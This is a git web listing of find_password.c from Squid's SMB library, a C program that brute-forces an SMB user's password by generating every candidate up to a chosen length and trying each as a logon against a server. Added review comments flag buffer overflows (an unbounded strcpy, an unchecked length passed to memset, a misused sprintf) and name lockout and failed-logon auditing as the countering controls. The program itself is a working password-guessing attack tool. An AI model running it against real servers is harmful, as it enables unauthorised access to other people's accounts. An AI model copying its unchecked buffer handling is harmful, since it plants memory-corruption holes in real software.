git.ipfire.org Git - thirdparty/squid.git/blob - lib/smblib/find_password.c
2 * Copyright (C) 1996-2017 The Squid Software Foundation and contributors
4 * Squid software is distributed under GPLv2+ license and includes
5 * contributions from numerous individuals and organizations.
6 * Please see the COPYING and CONTRIBUTORS files for details.
10 /* Find passwords ... */
11 /* We do it in a brute force way ... Cycle through all the possible passwords
12 sending a logon to see if it works ... We have to wait for any timeout
13 that the server implements before we try the next one. We could open lots
14 of connections to the server and then send the logon request and not wait
15 for the reply. This would allow us to have lots of outstanding attempts at
18 #include <sys/types.h>
24 #include "smblib/smblib.h"
29 char *SMB_Prots
[] = {"PC NETWORK PROGRAM 1.0",
30 "MICROSOFT NETWORKS 1.03",
31 "MICROSOFT NETWORKS 3.0",
43 fprintf(stderr
,"Usage: find_password -u <user> -l <pwd-len-max> server\n");
46 /* figure out next password */
48 static int pwinit
= FALSE
, pwpos
= 0;
50 int next_password(char *pw
, int pwlen
)
55 if (pwinit
== FALSE
) {
58 memset(pw
, 0, pwlen
+ 1);
69 /* If it has wrapped around, then inc to 1 and carry up the chain */
76 if (i
< 0) { /* If we went off the end, increment pwpos */
79 if (pwpos
>= pwlen
) return(FALSE
); /* No more passwords */
93 static char pwd_str
[1024]; /* Where we put passwords as we convert them */
95 char *print_password(char * password
)
103 for (i
= 0; i
< strlen(password
); i
++) {
/* NOTE(review): password[i] is a plain char. Where char is signed, a byte
   above 127 is negative at this point: the (unsigned) conversion makes it a
   very large value, so this branch is taken, and "%03i" then prints it with a
   minus sign, using up to four characters, while j below advances by only
   three. Converting through (unsigned char) before the test and the format
   would keep the escape at three digits. No check of j against
   sizeof(pwd_str) (1024) is visible in this listing -- confirm the caller
   never passes a string long enough to matter. */
105 if (((unsigned)password
[i
] <= ' ') || ((unsigned)password
[i
] > 127)) {
108 snprintf(temp
, sizeof(temp
)-1, "%03i", (int)password
[i
]);
109 strcpy(&pwd_str
[j
+ 1], temp
);
110 j
= j
+ 3; /* Space for \ accounted for below */
113 pwd_str
[j
] = password
[i
];
119 pwd_str
[j
] = 0; /* Put a null on the end ... */
125 main(int argc
, char *argv
[])
131 int opt
, error
, SMB_Error
, err_class
, err_code
, pwlen
, tries
= 0;
132 char server
[80], service
[80], service_name
[160], password
[80], username
[80];
133 char old_password
[80], err_string
[1024];
136 strncpy(service
, "IPC$", sizeof(service
) - 1);
142 while ((opt
= getopt(argc
, argv
, "s:u:l:v")) != EOF
) {
/* NOTE(review): unbounded copy. optarg comes straight from the command line
   (presumably the -s option, given the "s:u:l:v" getopt string) and service
   is declared as char[80], so a longer argument writes past the end of the
   array. A bounded, always-terminated copy such as
   snprintf(service, sizeof(service), "%s", optarg) avoids that. */
147 strcpy(service
, optarg
);
150 case 'u': /* Pick up the user name */
152 strncpy(username
, optarg
, sizeof(username
) - 1);
155 case 'l': /* pick up password len */
/* NOTE(review): pwlen is taken from -l with atoi(), which cannot report
   non-numeric input, and no range check is visible in this listing. The value
   is later handed to next_password() together with the 80-byte password
   array, and next_password() clears pwlen + 1 bytes of that buffer with
   memset(), so a value of 80 or more writes past the array. Parsing with
   strtol() and rejecting anything outside 1 .. sizeof(password) - 1 would
   close that. */
157 pwlen
= atoi(optarg
);
160 case 'v': /* Verbose? */
173 if (optind
< argc
) { /* Some more parameters, assume is the server */
174 strncpy(server
, argv
[optind
], sizeof(server
) - 1);
177 strcpy(server
, "nemesis");
180 if (verbose
== TRUE
) { /* Print out all we know */
182 fprintf(stderr
, "Finding password for User: %s, on server: %s\n",
184 fprintf(stderr
, "with a pwlen = %i\n", pwlen
);
188 SMB_Init(); /* Initialize things ... */
190 /* We connect to the server and negotiate */
192 con
= SMB_Connect_Server(NULL
, server
);
194 if (con
== NULL
) { /* Error processing */
196 fprintf(stderr
, "Unable to connect to server %s ...\n", server
);
198 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
200 SMB_Error
= SMB_Get_Last_SMB_Err();
201 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
202 SMBlib_Error_Code(SMB_Error
),
204 sizeof(err_string
) - 1);
207 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
210 printf(" %s\n", err_string
);
215 /* We need to negotiate a protocol better than PC NetWork Program */
217 if (SMB_Negotiate(con
, SMB_Prots
) < 0) {
219 fprintf(stderr
, "Unable to negotiate a protocol with server %s ...\n",
222 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
224 SMB_Error
= SMB_Get_Last_SMB_Err();
225 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
226 SMBlib_Error_Code(SMB_Error
),
228 sizeof(err_string
) - 1);
231 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
234 printf(" %s\n", err_string
);
/* NOTE(review): a size is passed as the second argument, which is snprintf()'s
   calling convention. sprintf() expects the format string in that position,
   so this call does not match its prototype and no bound is applied.
   service_name is 160 bytes and server and service are 80 bytes each, so the
   likely intent is
   snprintf(service_name, sizeof(service_name), "\\\\%s\\%s", server, service). */
239 sprintf(service_name
, sizeof(service_name
)-1, "\\\\%s\\%s", server
, service
); /* Could blow up */
241 /* Now loop through all password possibilities ... */
243 memset(password
, 0, sizeof(password
));
/* One SMB_Logon_And_TCon() request is issued per candidate produced by
   next_password(), all on the connection con opened above. On the server
   side each rejected candidate is an ordinary failed logon for the same
   account, so failed-logon auditing and an account lockout threshold are the
   controls that observe and cut short a loop of this shape. */
245 while (next_password(password
, pwlen
) == TRUE
) {
247 if ((tree
= SMB_Logon_And_TCon(con
,
251 service_name
, "?????")) == NULL
) {
253 if (verbose
== TRUE
) { /* Lets hear about the error */
255 fprintf(stderr
, "Unable to logon and tree connect to server %s ...\n",
257 fprintf(stderr
, "With username: %s, and password: %s\n",
258 username
, print_password(password
));
260 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
262 SMB_Error
= SMB_Get_Last_SMB_Err();
263 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
264 SMBlib_Error_Code(SMB_Error
),
266 sizeof(err_string
) - 1);
269 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
272 printf(" %s\n", err_string
);
275 } else { /* Password match */
277 fprintf(stderr
, "Logged in with password:%s\n",
278 print_password(password
));
288 fprintf(stderr
, "Passwords exhausted.");